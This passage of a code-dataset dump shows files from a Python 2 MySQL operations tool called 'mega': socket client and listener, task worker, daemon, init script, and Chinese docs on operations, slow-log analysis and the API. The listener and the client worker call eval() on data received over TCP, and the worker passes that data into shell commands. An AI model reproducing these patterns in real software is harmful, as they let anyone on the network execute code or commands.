_item:\n if not _d.get(_i):\n _d[_i]=DEFAULT_NONE \n return _d\n \n def _data_unpack(self,data):\n if not data:\n return ''\n return data.replace(END_SIGN,'')\n \n def close(self):\n self.s.close() \n\n\nclass MegaTool():\n\n def __init__(self):\n pass\n\n def get_all_funcs(self):\n cmd='get_all_funcs'\n self.c=MegaClient(cmd=cmd)\n func_list=self.c.run(TOOL=True)\n if func_list:\n i=1\n for f in eval(func_list):\n print i,f['name'],f['args']\n i+=1\n self.close()\n \n def close(self):\n self.c.close\n\ndef get_help():\n print 'usage:'\n print 'python sender.py [help] -get this doc'\n print 'python sender.py list -get all the supported fucntion and description'\n print MegaClient().__doc__\n \n\nif __name__==\"__main__\":\n import sys\n cmd=''\n if len(sys.argv)>1:\n cmd=sys.argv[1]\n if cmd.upper()=='LIST':\n t=MegaTool()\n t.get_all_funcs()\n#for test\n elif cmd.upper() == 'HELP' or '-H':\n get_help()\n else:\n cmd='get_all_instance'\n c=MegaClient(cmd=cmd)\n if c:\n print c.run(func_args=\"model='backup',stat=1,role=1\",CYCLE=1)\n c.close()\n else:\n get_help()\n" }, { "alpha_fraction": 0.570644736289978, "alphanum_fraction": 0.5770461559295654, "avg_line_length": 26.350000381469727, "blob_id": "482e48dfbbca9b54fb38f2fff945d5fca52cd32d", "content_id": "c01b093813e020eb43861e6edbaa7efa94a0f6e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2187, "license_type": "no_license", "max_line_length": 70, "num_lines": 80, "path": "/src/mega_service/listener.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding: UTF-8 -*-\nimport sys\nsys.path.append('..')\nimport socket\nimport multiprocessing \nimport SocketServer\nfrom SocketServer import StreamRequestHandler as SRH\nfrom conf.GlobalConf import DEFAULT_TCP_PORT,DEFAULT_TCP_HOST,DEBUG\nfrom lib.logs import Logger\nfrom worker import work_deliver\n\nEND_SIGN='EOF'\nERROR='-1'\nSUCCESS='0'\nTCP_HEADER=['HEAD','MEGA']\nBUFFER_SIZE=10\nHEADER_LENGTH=10\n\nMODEL='Listener'\nlog = Logger(MODEL).log()\n \nclass Servers(SRH):\n def handle(self):\n log.debug('Get connection from %s' % str(self.client_address))\n global q\n result=''\n data=''\n header=''\n \n 
header=int(self.request.recv(HEADER_LENGTH))\n while header>0:\n _d= self.request.recv(BUFFER_SIZE)\n data+=_d\n if _d.find(END_SIGN) > 0:\n break\n header=header-BUFFER_SIZE\n# print header,_d\n data=data.replace('EOF', '')\n log.debug(data)\n if self.data_check(data):\n _w=work_deliver(data)\n result=str(_w)\n else:\n result=ERROR\n #log.debug(result)\n#todo : \n# get the len(result),add the length to the head of packget, \n# chancel the end sign\n _len=len(result)+HEADER_LENGTH\n _header=str(_len)\n for i in range(HEADER_LENGTH - len(str(_len))):\n _header='0'+_header\n self.request.sendall(_header+result+END_SIGN)\n \n def data_check(self,data):\n if len(data) == 0:\n return False\n try:\n if eval(data).get(TCP_HEADER[0]).upper() != TCP_HEADER[1]:\n return False\n except:\n log.error('Invilid TCP header of packege!')\n return False\n return True\n \ndef tcp_server(queue,host=DEFAULT_TCP_HOST,port=DEFAULT_TCP_PORT):\n global q\n q=queue\n addr = (host,port)\n log.info('TCP Server listen on %s' % str(addr))\n try: \n server = SocketServer.ThreadingTCPServer(addr,Servers)\n server.serve_forever()\n except Exception as ex:\n log.error('TCP server start failed as: %s',ex)\n sys.exit(1)\n\n\nif __name__==\"__main__\":\n tcp_server()" }, { "alpha_fraction": 0.5291399955749512, "alphanum_fraction": 0.6648898124694824, "avg_line_length": 37.53424835205078, "blob_id": "4c93dd7a33c29cc7a510b23075c1f5c42c1478e8", "content_id": "5ebf0f02b31396b612f5695183e12031d2d0488c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2926, "license_type": "no_license", "max_line_length": 118, "num_lines": 73, "path": "/docs/mega_op.md", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#Mega 运维手册\n\n##Mega Web \n* 启动\n\t\n\t\tuwsgi --yaml /export/servers/app/mega/src/wsgi.yaml\n\t\n* 配置文件:\n\n\t\t$cat wsgi.yaml\n\t\tuwsgi:\n\t\t\thttp: 0.0.0.0:8080\n\t \t\tchdir: /export/servers/app/mega/src\n \t\t\tmodule: django_wsgi\n \t\t\tprocesses: 2\n\t \t\tdaemonize: /tmp/uwsgi.log\n \t\t\tpidfile: /tmp/uwsgi.pid\n\n* 正常启动日志:\n\t\t\n\t\t*** Starting uWSGI 2.0.7 (64bit) on [Mon Sep 22 17:49:17 2014] ***\n\t\tcompiled with version: 4.4.7 20120313 (Red Hat 4.4.7-3) on 22 September 2014 16:19:56\n\t\tos: Linux-2.6.32-358.el6.x86_64 #1 SMP Fri Feb 22 00:31:26 UTC 2013\n\t\tnodename: MYSQL-YZH-6237\n\t\tmachine: x86_64\n\t\tclock source: unix\n\t\tdetected number of CPU cores: 24\n\t\tcurrent working directory: /export/servers/app/mega/src\n\t\twriting pidfile to /tmp/uwsgi.pid\n\t\tdetected binary path: /usr/bin/uwsgi\n\t\t!!! no internal routing support, rebuild with pcre support !!!\n\t\t*** WARNING: you are running uWSGI without its master process manager ***\n\t\tyour processes number limit is 64000\n\t\tyour memory page size is 4096 bytes\n\t\tdetected max file descriptor number: 65535\n\t\tlock engine: pthread robust mutexes\n\t\tthunder lock: disabled (you can enable it with --thunder-lock)\n\t\tuWSGI http bound on 0.0.0.0:8080 fd 4\n\t\tspawned uWSGI http 1 (pid: 28736)\n\t\tuwsgi socket 0 bound to TCP address 127.0.0.1:17925 (port auto-assigned) fd 3\n\t\tPython version: 2.6.6 (r266:84292, Feb 22 2013, 00:00:18) [GCC 4.4.7 20120313 (Red Hat \t\t4.4.7-3)]\n\t\t*** Python threads support is disabled. 
You can enable it with --enable-threads ***\n\t\tPython main interpreter initialized at 0x2677bf0\n\t\tyour server socket listen backlog is limited to 100 connections\n\t\tyour mercy for graceful operations on workers is 60 seconds\n\t\tmapped 145536 bytes (142 KB) for 2 cores\n\t\t*** Operational MODE: preforking ***\n\t\tWSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x2677bf0 pid: 28735 \t\t(default app)\n\t\t*** uWSGI is running in multiple interpreter mode ***\n\t\tspawned uWSGI worker 1 (pid: 28735, cores: 1)\n\t\tspawned uWSGI worker 2 (pid: 28737, cores: 1)\n* 运行状态\n\n\t\t线程状态:\n\t\t[3-MySQL-Inst@MYSQL-YZH-6237 ~]\n\t\t$ps aux |grep wsgi\n\t\txdba 28735 0.0 0.0 314472 27380 ? S 17:49 0:00 uwsgi --yaml /export/servers/app/mega/src/wsgi.yaml\n\t\txdba 28736 0.0 0.0 51420 1744 ? S 17:49 0:00 uwsgi --yaml /export/servers/app/mega/src/wsgi.yaml\n\t\txdba 28737 0.0 0.0 314576 26300 ? S 17:49 0:00 uwsgi --yaml /export/servers/app/mega/src/wsgi.yaml\n\t\txdba 33624 0.0 0.0 143720 4032 pts/16 S+ 18:01 0:00 vim uwsgi.log\n\t\troot 35483 0.0 0.0 103244 852 pts/5 S+ 18:06 0:00 grep wsgi\n\n\t\t网络监听:\n\t\t[3-MySQL-Inst@MYSQL-YZH-6237 ~]\n\t\t$netstat -lnpt |grep 8080\n\t\ttcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 28735/uwsgi\n\t\t\n* 关闭\n \n\t uwsgi --stop /tmp/uwsgi.pid\n 执行后检查进程状态,确认关闭。\n* 重启\n 关闭后启动\n\n" }, { "alpha_fraction": 0.48400452733039856, "alphanum_fraction": 0.4960481822490692, "avg_line_length": 26.6875, "blob_id": "cc883e483e212a73c0fbf4b5154febb17c55496f", "content_id": "e7c982a67c0aed12d016bf5c93e4ec75bacf6d87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2657, "license_type": "no_license", "max_line_length": 110, "num_lines": 96, "path": "/src/mega_client/mega_client/worker.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 29, 2014\n\n@author: xchliu\n\n@module:mega_service.mega_client.worker\n'''\nimport os\nimport sys\nimport time\nimport commands\n\nimport ping\nfrom setting import SCRIPT_DIR,DEFAULT_TARGET,KEEPALIVE\nfrom logs import Logger\n\n\nMODEL='Worker'\nlog = Logger(MODEL).log()\n\n\nclass Worker():\n \n def __init__(self,cmd):\n self.cmd=cmd\n self.error=''\n self.error_code=0\n self.data={}\n \n def _work_resolve(self):\n '''\n {'TARGET': 'python', 'ARGS': \"{'ip': u'localhost', 'version': u'5.6', 'id': 12L, 'port': 3310L}\", \n 'VALUE': 'test.py', 'TIME': 0, 'TYPE': 0, 'CYCLE': 0}\n TYPE:\n 0 call the script outside mega project:setting.SCRIPT_DIR\n 1 call the script in diretory :mega_client/script/\n '''\n _item=['TYPE','TIME','VALUE','CYCLE','TARGET','ARGS']\n _data={}\n self.cmd=eval(self.cmd)\n for i in _item:\n _data[i]=self.cmd.get(i,None)\n if not _data['VALUE']:\n return False\n if not _data['TARGET']:\n _data['TARGET']=DEFAULT_TARGET\n self.data=_data\n log.debug(self.data)\n return True\n \n def run(self):\n if not self._work_resolve():\n return self.error_code,self.error\n _cmd_type=self.data.get('TARGET')\n _type=self.data.get('TYPE')\n if int(_type) == 0 :\n script_dir=SCRIPT_DIR\n else:\n script_dir=os.path.join(sys.path[0],'script/')\n if _cmd_type== 'cmd':\n _cmd_type=''\n _cmd=\"%s %s%s \\\"%s\\\" \" % (_cmd_type,script_dir,self.data['VALUE'],self.data['ARGS'])\n log.debug(_cmd)\n status,output=commands.getstatusoutput(_cmd)\n if status <>0:\n log.error(str(status)+' : '+output)\n return status,output\n \n \nclass Monitor():\n '''\n client monitor\n '''\n \n def __init__(self):\n self.sleep=KEEPALIVE\n \n def 
monitor(self):\n log.info(\"Monitor is Starting...\")\n _count=0 \n while 1:\n try:\n keepalive=ping.main()\n if keepalive == 'failed':\n _count+=1\n log.error('keepalive check :%s'% keepalive)\n else:\n self.sleep=KEEPALIVE \n if _count >100:\n self.sleep+=60\n log.error('keepalive check :%s for %s times ,abort!'% (keepalive,_count))\n time.sleep(self.sleep)\n except Exception as ex:\n log.error(ex)\n return" }, { "alpha_fraction": 0.46720612049102783, "alphanum_fraction": 0.4727427661418915, "avg_line_length": 26.313953399658203, "blob_id": "088936cfb38b51676cfc1f57011c43ec60e01c38", "content_id": "f5470185c3f98267cf9d91a66ed33e0083ebdff4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2348, "license_type": "no_license", "max_line_length": 83, "num_lines": 86, "path": "/src/mega_client/mega-1.0/mega_client/client_main.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 29, 2014\n\n@author: xchliu\n\n@module:mega_service.mega_client.client_main\n'''\nimport os\nimport sys\nimport time\nimport datetime\nimport multiprocessing\n\napp_path=os.path.dirname(sys.path[0])\nsys.path.append(app_path)\n\nfrom listener import tcp_server\nfrom logs import Logger\nfrom worker import Monitor\n\nMODEL='ClientMain'\nlog = Logger(MODEL).log()\n\ndef main(pidfile=None): \n log.info(\"=============BEGIN===========\")\n log.info('Mega Client server start at %s ' % datetime.datetime.now())\n thread=[]\n child_pids=[]\n childs={\"Client Monitor\":Monitor().monitor,\n \"Client Listener\":tcp_server\n }\n try:\n for child in childs.items():\n c=sub_process(child)\n if c:\n thread.append(c)\n except Exception as ex:\n log.error(ex)\n \n for t in thread:\n t.daemon=True\n t.start()\n child_pids.append(t.pid)\n file(pidfile,'a+').write(\"%s\\n\" % t.pid)\n log.info((t.pid,t.name))\n\n \n #restart the subprocess if error occur \n while 1:\n time.sleep(30)\n try:\n for t in thread:\n if t.is_alive() == False:\n if t.pid in child_pids:\n child_pids.remove(t.pid)\n if t in thread:\n thread.remove(t)\n #try to restart the dead sub process\n _t=sub_process((t.name,childs.get(t.name))) \n thread.append(_t)\n _t.start() \n child_pids.append(_t.pid)\n log.info((_t.pid,_t.name))\n \n #flush the pids into pid file\n if pidfile:\n f=open(pidfile,'w')\n #f.truncate()\n for pid in child_pids:\n f.write(\"%s\\n\" % pid)\n f.flush()\n f.close() \n except Exception as ex:\n log.error(ex)\n break\n return child_pids\n\ndef sub_process(func):\n if not func:\n return False\n return multiprocessing.Process(target=func[1],args=(),name=func[0])\n \n \nif __name__=='__main__':\n main()" }, { "alpha_fraction": 0.5082101821899414, "alphanum_fraction": 0.5706075429916382, "avg_line_length": 24.113401412963867, "blob_id": "5499b78b8cda5f49c4868e0b4b373875f28c980e", "content_id": "cd9ce29b62a9d9a59354de0a08ebc3b976245ddd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2990, "license_type": "no_license", "max_line_length": 91, "num_lines": 97, "path": "/docs/slow_log.md", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# Slow Log 慢查询分析统计\n##功能点\n * 收集查询明细及执行计划\n * 按维度聚合分析慢查询\n * 趋势分析\n \n##配置要求\n* 开启慢查询\n* 设置慢查询登记时间\n* \n\n##流程\n 收集脚本 -> sender -> listener -> worker ->api:slowlog -> db : slow_log \n \n 离线分析模块 -> 统计数据模块 -> web 页面\n \n \n \n##接口定义\n\n\tvar='''\n \t{'db_host': '127.0.0.1',\n\t 'port': 3306,\n \t'start_time':'0000-00-00 
00:00:00',\n\t 'user':'xchliu',\n\t 'user_host':'127.0.0.1',\n \t'query_time': 20,\n\t 'lock_time':12,\n\t 'rows_sent':21,\n\t 'rows_examined':22,\n\t 'sql_text':'select 1',\n\t 'sql_explained':\"{test:test}\"\n\t}\n\t'''\n\n\n##统计项\n1. 全局按天慢查询总数\n2. 全局按执行时长分布\n3. 全局按执行时间分布\n4. 实例按天慢查询变化\n5. sql 格式化后聚合统计\n6. topsql 按次数,时长,row排序\n\n### 统计逻辑\n\n1. 统计每小时进行一次,计算上一小时接受的慢查询信息。\n2. 遍历数据集对每一个slowlog 进行解析,格式化,计算维度值(time,row,count)\n3. 更新按实例统计维度表。slowlog_time_hour\n3. 更新按天统计表\n\n\n##数据表设计\n\n\tCREATE TABLE `slowlog_info` (\n\t `id` int(11) NOT NULL AUTO_INCREMENT,\n\t `db_host` varchar(200) COLLATE utf8_bin DEFAULT NULL,\n\t `port` int(11) DEFAULT NULL,\n\t `start_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,\n\t `user` varchar(200) COLLATE utf8_bin DEFAULT NULL,\n\t `user_host` varchar(200) COLLATE utf8_bin DEFAULT NULL,\n\t `query_time` float(10,4) DEFAULT NULL,\n\t `lock_time` float(10,4) DEFAULT NULL,\n\t `rows_sent` int(11) DEFAULT NULL,\n\t `rows_examined` int(11) DEFAULT NULL,\n\t `sql_text` mediumtext COLLATE utf8_bin,\n\t `sql_explained` mediumtext COLLATE utf8_bin,\n\t PRIMARY KEY (`id`)\n\t) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8 COLLATE=utf8_bin\n\n##元数据\n\t\n\tTime: 140228 16:15:10\n\tUser@Host: root[root] @ [127.0.0.1] Id: 15\n\tQuery_time: 2.201578 Lock_time: 0.000080 Rows_sent: 1170482 Rows_examined: 1170482\n\tuse dm;\n\tSET\ttimestamp=1393575310;\n\tSELECT /*!40001 SQL_NO_CACHE */ * FROM `fct_dat_moto_sp_pay_day`;\n\n执行计划:\n\t\n\tmysql> explain select * from user;\n\t+----+-------------+-------+------+---------------+------+---------+------+------+-------+\n\t| id | select_type | table | type | possible_keys | key | key_len | ref | rows | Extra |\n\t+----+-------------+-------+------+---------------+------+---------+------+------+-------+\n\t| 1 | SIMPLE | user | ALL | NULL | NULL | NULL | NULL | 7 | |\n\t+----+-------------+-------+------+---------------+------+---------+------+------+-------+\n\t1 row in set (0.00 sec)\n\n##规则说明\n1.sql唯一性\n\t使用sql解析时的timestamp和sql一起生成一个hash,用于标识一类唯一的sql:\n\t\t \n\treturn hash(str(time.time())+str)\n2.sql 解析\n\n配置所有变量并替换为N。不区分类型。样例sql可通过hash值获取。\n" }, { "alpha_fraction": 0.4947916567325592, "alphanum_fraction": 0.5182291865348816, "avg_line_length": 21, "blob_id": "48acd233dbbaaaf816affb20df68c38fdc569ff1", "content_id": "c5fd18b904ace4918148268fbb68edb07edacf44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 384, "license_type": "no_license", "max_line_length": 56, "num_lines": 17, "path": "/src/mega_web/mega_portal/file_manage.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 29, 2014\n\n@author: xchliu\n\n@module:mega_portal.file_manage\n'''\nfrom django import forms\n\n\nclass UploadFileForm(forms.Form):\n# title =forms.CharField(max_length=50)\n file = forms.FileField(\n # label='Choose a file',\n # help_text='doc,ppt,pdf etc.'\n ) \n \n " }, { "alpha_fraction": 0.5581947565078735, "alphanum_fraction": 0.5914489030838013, "avg_line_length": 15.20512866973877, "blob_id": "1daa71417d74940aad48052044fa510bfe260ad5", "content_id": "ad3bd6ce4804ac06e31e7049726aafa07aff4353", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1263, "license_type": "no_license", "max_line_length": 67, "num_lines": 78, "path": "/src/scripts/mega_service.sh", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\n# 
Mega service init script\n#\n#\n#\n#Xchliu\n#2014-06-20\n###END\n\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\nNAME=mega\nDESC='Mega Service '\nAPP_DIR='/export/servers/app/mega/src/'\n#APP_DIR='..'\n\nMAIN_PWD=$APP_DIR/mega_service/daemon.py\nLOG_DIR=''\nPID_FILE=/var/run/$NAME.pid\n\nfunction is_alive()\n{\n\tPID=$1\n\tPSTATE=`ps -p \"$PID\" -o s=`\n\tif [ \"D\" = \"$PSTATE\" -o \"R\" = \"$PSTATE\" -o \"S\" = \"$PSTATE\" ]; then\n\t\t# Process is alive\n\t\techo 'A'\n\telse\n\t\t# Process is dead\n\t\techo 'D'\n\tfi\n}\n\nfunction stop_mega()\n{\n#\tif [ -f \"${PID_FILE}\" ];then\n#\t\tPID=`CAT $PID_FILE`\n#\t\tif [ 'A' = \"`is_alive $PID`\" ];then\n#\t\t\tkill -INT $PID\n#\t\tfi\n#\t\trm \"$PID_FILE\"\n#\tfi\n\tsudo python $MAIN_PWD stop\n#echo \"${NAME} stop/waiting.\"\n}\n\nfunction start_mega()\n{\n\tsudo python $MAIN_PWD start\n}\ncase \"$1\" in\n\tstart)\n\t\techo -n \"Starting $DESC...\"\n\t\tstart_mega\n\t\techo -e \"\\033[32m Done \\033[0m\"\n\t\t;;\n\tstop)\n\t\techo -n \"Stopping $DESC...\"\n\t\tstop_mega\n\t\techo -e \"\\033[32m Done \\033[0m\"\n\t\t;;\n\trestart)\n\t\techo -n \"Restarting $DESC...\"\n\t\tstop_mega\n\t\tsleep 6\n\t\tstart_mega\n\t\techo -e \"\\033[32m Done \\033[0m\"\n\t\t;;\n\tstatus)\n\t\tstatus_of_proc -p $PID_FILE \"$DAEMON\" uwsgi && exit 0 || exit $?\n\t\t;;\n\t*)\n\t\techo \"Usage: $NAME {start|stop|restart|status}\" >&2\n\t\texit 1\n\t\t;;\nesac\n\nexit 0" }, { "alpha_fraction": 0.4812000095844269, "alphanum_fraction": 0.4828000068664551, "avg_line_length": 34.70000076293945, "blob_id": "1b18f98c3e2486293b7cb0a4f5a535326927f491", "content_id": "502205e4300c9eeeeeedee0f23c9723c20461153", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2500, "license_type": "no_license", "max_line_length": 106, "num_lines": 70, "path": "/src/mega_service/mega_main.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import datetime\nimport multiprocessing\nfrom listener import tcp_server\nfrom worker import Worker\nfrom tracker import Tracker\nfrom lib.logs import Logger\n\nMODEL='MAIN'\nlog=Logger(MODEL).log()\n\n\n\nclass SubProcess:\n def __init__(self):\n self.threads=[]\n self.child_pids=[]\n\n #===========================================================================\n # sub_process\n # Start the child processes:\n # 1.worker Resolve and do the jobs \n # 2.listens Accept task from mega sender \n # 3.trackers Track task from database\n # 4.monitor Internal monitor \n #===========================================================================\n def sub_process(self,pidfile):\n global queue\n queue = multiprocessing.Queue()\n worker=Worker(queue,).worker\n tracker=Tracker(queue).tracker\n try:\n log.info('Start Subprocess: ') \n workers=multiprocessing.Process(target=worker,args=(),name=\"Main Worker\")\n self.threads.append(workers) \n listeners=multiprocessing.Process(target=tcp_server,args=(queue,),name=\"TCP Listener\") \n self.threads.append(listeners) \n trackers=multiprocessing.Process(target=tracker,args=(),name=\"Tracker\")\n self.threads.append(trackers) \n monitor=multiprocessing.Process(target=self.monitor,args=(),name=\"Monitor\")\n self.threads.append(monitor)\n for t in self.threads:\n # t.daemon=True\n t.start()\n self.child_pids.append(t.pid)\n log.info([t.name,t.pid])\n if pidfile:\n file(pidfile,'a+').write(\"%s\\n\" % t.pid)\n for t in self.threads:\n t.join()\n except Exception as ex:\n log.warning('Get interrupt signal,quit now!')\n 
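The SubProcess.sub_process method above wires one shared multiprocessing.Queue into the Worker, TCP listener and Tracker children before joining them. A minimal, self-contained sketch of that supervisor pattern, with placeholder functions standing in for the real children (the names fake_tracker and fake_worker are illustrative, not part of this codebase):

    import multiprocessing

    def fake_tracker(queue):
        # stands in for Tracker: push one task onto the shared queue
        queue.put({'task': 'demo'})

    def fake_worker(queue):
        # stands in for Worker: take one task off the shared queue
        task = queue.get(timeout=5)
        print('worker got: %s' % task)

    if __name__ == '__main__':
        queue = multiprocessing.Queue()
        children = [
            multiprocessing.Process(target=fake_tracker, args=(queue,), name='Tracker'),
            multiprocessing.Process(target=fake_worker, args=(queue,), name='Main Worker'),
        ]
        for child in children:
            child.start()
            print('%s %s' % (child.name, child.pid))
        for child in children:
            child.join()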
log.error(ex)\n self.pool_close()\n return self.child_pids\n \n #===========================================================================\n # monitor\n #===========================================================================\n def monitor(self):\n log.debug(self.child_pids)\n \n\n \ndef main(pidfile):\n log.info(\"=============BEGIN===========\")\n log.info('Mega server start at %s ' % datetime.datetime.now())\n SubProcess().sub_process(pidfile)\n\nif __name__ == \"__main__\":\n main()\n\n" }, { "alpha_fraction": 0.6154857277870178, "alphanum_fraction": 0.6432233452796936, "avg_line_length": 25.41319465637207, "blob_id": "7e46c2c263e7267da6df2550437800c39f8fcd20", "content_id": "7a6b2134aa2de18da7ba14f6bc72dabbeb5869c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7869, "license_type": "no_license", "max_line_length": 134, "num_lines": 288, "path": "/docs/api.md", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#API \n\n##通用API\n\n##资源池API\n*\tdef get_all_instance(model=None,stat=0,count=0):\n \n return all instance object as a list of dicts and an error code sign the result, 0 means success\n \n keys:\n \t\n \tid ip port server_id name level stat business_id business owner_id owner db_type ha_type online_date\n \n \n model :the model who do the api calling\n \n stat: \n \n \t\t0 all (default) \n 1 only the online instance \n 2 only the offline instances\n \n count: counts of instances for return ,default 0(all)\n \n* def get_all_server(model=None,stat=0,count=0):\n \n return a list of dicts and an error code sign the result, 0 means success\n \n keys: \n \t\n \tid,ip,name,os,stat,owner,owner_name,online_date\n \n model :the model who do the api calling\n \n stat: \n \t\n \t\t0 all (default) \n 1 only the online instance \n 2 only the offline instances\n \n \n count: counts of instances for return ,default 0(all)\n\n* def get_all_db(model=None,stat=0,count=0):\n \n return a list of dicts and an error code sign the result, 0 means success\n \n keys: \n \n\t\tid,ip,port,name,level,instance_id,business_id,business,owner,owner_nameo,nline_date,stat\n \n model :the model who do the api calling\n \n stat: \n \t\t\n \t\t0 all (default) \n 1 only the online instance \n 2 only the offline instances\n\n count: counts of instances for return ,default 0(all) \n* def get_instance(model=None,ip=None,port=3306):\n \n Return a dict of instance data and an error code \n \n keys : \n \t\n \tid ip port server_id stat name level db_type online_date business_id owner ha_type\n \n\tmodel:the model who do the api calling\n \n ip : instance ip\n \n port: port(default 3306)\n \n* def get_database(model=None,ip=None,port=3306,db=None):\n\n Return a dict of database data and an error code\n\n keys :\n \n\t id name level online_date business_id instance_id owner stat\n\n model:the model who do the api calling\n\n ip : instance ip\n\n port: port(default 3306)\n\n db : name of database\n\n* def get_server(model=None,ip=None):\n \n Return a dict of server data and an error code\n \n keys :\n \n \tstat name ip online_date owner os id\n \n model:the model who do the api calling\n \n ip : server ip\n\n* def add_server(ip,**args):\n \n Return an error code for the result of server add. 0 means success\n \n ip : server ip \n \n args: server base info ,if not given ,default value will be used\n \n keys:server_name,server_online,server_owner,server_os \n* def mod_server(ip,**args):\n \n Return an error code for the result of server modify. 
0 means success\n \n ip : server ip \n \n args: server base info \n \n keys:\n \t\n \tserver_name,server_online,server_owner,server_os \n \n* def del_server(ip):\n\n Return an error code for the result of server del. 0 means success\n\n ip : server ip \n \n* def add_instance(ip,port,**args):\n \n Return an error code for the result of instance add. 0 means success\n \n ip: instance ip \n \n port: instance port\n \n args:\n \t\n \tinstance_level instance_name instance_bussiness instance_online instance_owner instance_dbtype instance_hatype\n \n If the server does not exists ,a new server will be add automatic\n* def mod_instance(ip,port,**args):\n\n\tReturn an error code for the result of server modify. 0 means success\n\n ip: instance ip \n\n port: instance port\n\n args:\n \t\n \tinstance_level instance_name instance_bussiness instance_online instance_owner instance_dbtype instance_hatype\n* def del_instance(ip,port):\n \n Return an error code for the result of instance del. 0 means success\n \n ip : server ip \n \n port : instance port\n* def add_database(db,ip,port,**args):\n \n Return an error code for the result of instance add. 0 means success\n \n ip : server ip \n \n db: db name\n \n port: instance port\n \n args: server base info ,if not given ,default value will be used\n\n keys:\n \n \tdatabase_ip database_port database_name database_level database_owner database_business database_online\n\n if the instance does not exists ,a new instance will be add automatic\n* def mod_database(ip,port,db,**args):\n \n Return an error code for the result of database modify. 0 means success\n \n ip : server ip \n \n db: db name\n \n port: instance port\n \n args: database base info ,if not given ,default value will be used\n \n keys:\n \n \tdatabase_ip database_port database_name database_level database_owner database_business database_online\n \n* def del_database(ip,port,db):\n\n Return an error code for the result of database del. 
0 means success\n\n ip : server ip \n\n port : instance port\n\n db: db name\n\n* def failover(group_name,old_master,new_master,method,time):\n '''\n 1.update the instance and failover table ,change the replication relationship\n 2.save the switch log\n '''\n## 高可用接口\n###MySQL\n####接口定义\n\n* def update_ha_info(new_master,old_master):\n * new_master 新主库实例:\tIP:PORT\n * old_master 原主库实例:\tIP:PORT \n \n \tswitch the role inside a ha group\n\t master format:'1.1.1.1:3306' \n \n \t return :\n \t\tTrue | False\n \n* def add_failover_record(self,failover_id,method,old_master,new_master,failover_name=None):\n\n\t* failover_id 高可用ip,脚本调用传None\n\t* method \t\t切换方式\n\t* old_master 原主库实例\n\t* new_master 新主库实例\n\t* failover_name 高可用组名,脚本调用传组名称\n\t\n\t 1.add a failover record with a given failover id --used for mega web site\n 2.add record with a failover group name --used for command line ha switch\n \n return :\n None: failed to get the new record\n id(int): the new record for failover switch\n* def add_failover_record_detail(self,record_id,module,re_time,time_used,result,content):\n\t* record_id 任务号,由函数add_failover_record()返回或者mega 调用时提供\n\t* module 执行模块,\n\t* re_time \t 任务阶段记录时间\n\t* time_used 耗时\n\t* result \t 本阶段执行结果\n\t* content \t 执行信息\n\t\n\t\t record_id ,get from the function add_failover_record()\n 1.if task invoked by mega, the id will be given\n 2.if task begins from the command line, call the add_failover_record() and get the new record id befor add new detail logs\n \n return :\n\t\t\t\tTrue | False\n\n \n* def stat_failover_record(self,record_id,stat='Y'):\n\t* record_id 任务号\n\t* stat 执行结果,成功或者失败\n\t\t\n\t\t\t1.stat the result for a switch task\n\t\t\t\n\t\t\treturn :\n\t\t\t\tTrue | False\n\n####测试用例\n\n\t\timport time\n\t\tfrom mega_client import sender\n\t\tfrom mega_client.setting import MEGA_HOST\n\t\tformat='%Y-%m-%d %X'\n\t\tnow=time.strftime(format, time.localtime())\n\n\t\tcmd={\"update_ha_info\":\"'1.1.1.112:23','1.1.1.111:3306'\",\n\t\t #\"add_failover_record\":\"10,'ONLINE','1.1.1.112:23','1.1.1.111:3306'\",\n\t\t \"add_failover_record\":\"None,'ONLINE','1.1.1.112:23','1.1.1.111:3306','jjjj'\",\n\t\t \"stat_failover_record\":\"32,'Y'\",\n\t\t \"add_failover_record_detail\":\"31,'mega','%s','10','y','test the api'\" % now,\n \t\t}\n\t\tfor _cmd,f in cmd.iteritems():\n\t\t c=sender.MegaClient(host=MEGA_HOST,cmd=_cmd)\n\t\t r=c.run(func_args=f)\n\t\t c.close() \n\t\t print \"test %s %s: %s\" %(_cmd,f,r)\n\n运行效果:\n\t\n\t\txchliu@xchliu tests]$ python console_failover.py\n\t\ttest add_failover_record None,'ONLINE','1.1.1.112:23','1.1.1.111:3306','jjjj': 32\n\t\ttest add_failover_record_detail 31,'mega','2014-10-14 14:05:25','10','y','test the api': True\n\t\ttest update_ha_info '1.1.1.112:23','1.1.1.111:3306': False\n\t\ttest stat_failover_record 32,'Y': True\n" }, { "alpha_fraction": 0.6756551265716553, "alphanum_fraction": 0.6955943703651428, "avg_line_length": 31.918750762939453, "blob_id": "47340fd50e5a90b1b154deaf7db6bd48f3621e99", "content_id": "f3fc1ff4cd30671212e8dc268f6f7787663f2032", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 